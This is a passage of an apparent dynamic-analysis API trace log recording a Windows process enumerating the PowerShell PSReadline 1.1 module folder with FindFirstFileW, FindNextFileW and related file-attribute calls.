lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.215] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0178.215] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.215] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0178.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.215] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0178.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0178.216] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0178.216] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.216] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0178.216] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0178.217] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0178.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.217] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0178.219] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.219] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0178.220] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.220] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0178.220] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0178.221] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0178.221] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0178.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.222] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0178.223] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.223] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0178.223] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.224] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0178.224] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0178.224] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.224] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0178.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7dde90 | out: lpFindFileData=0x1b7dde90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.227] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.227] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.236] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0178.236] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de140) returned 1 [0178.236] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7dde90 | out: lpFindFileData=0x1b7dde90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.237] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.238] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.238] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddee0 | out: lpFindFileData=0x1b7ddee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.239] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de140) returned 1 [0178.239] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7ddef0 | out: lpFindFileData=0x1b7ddef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.239] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddf40 | out: lpFindFileData=0x1b7ddf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.240] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddf40 | out: lpFindFileData=0x1b7ddf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.240] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7ddf40 | out: lpFindFileData=0x1b7ddf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0178.240] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de1a0) returned 1 [0178.241] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff [0178.241] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7de080 | out: lpFindFileData=0x1b7de080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.282] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.283] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0178.283] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0178.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0178.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0178.284] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0178.285] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de330) returned 1 [0178.285] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff [0178.285] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, 